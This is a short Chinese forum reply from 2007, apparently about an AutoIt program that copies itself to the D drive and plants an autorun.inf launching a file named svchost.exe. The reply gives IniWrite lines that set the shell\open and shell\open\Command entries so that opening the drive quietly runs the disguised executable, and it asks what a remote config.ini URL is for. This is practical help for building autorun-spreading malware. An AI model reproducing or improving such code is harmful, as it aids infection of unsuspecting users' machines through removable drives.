|  | 
| 原帖由 lintel 于 2007-6-20 21:27 发表  
 查不多吧....:lol
你那东西好像只把自己复制到d盘,写autorun.inf时没想到去掉只读属性。
 用IniWrite("C:\windows\autorun.inf", "AutoRun", "OPEN", "svchost.exe")
 还不如用
 IniWrite("C:\windows\autorun.inf", "AutoRun", "OPEN", "svchost.exe")
 IniWrite("C:\windows\autorun.inf", "AutoRun", "shell\open", "打开(&O)")
 IniWrite("C:\windows\autorun.inf", "AutoRun", "shell\open\Command", "svchost.exe")
 这样第一项不会是“自动播放”。
 还有,那个http://www.joyren.cn/config.ini是干什么用的?
 | 
 |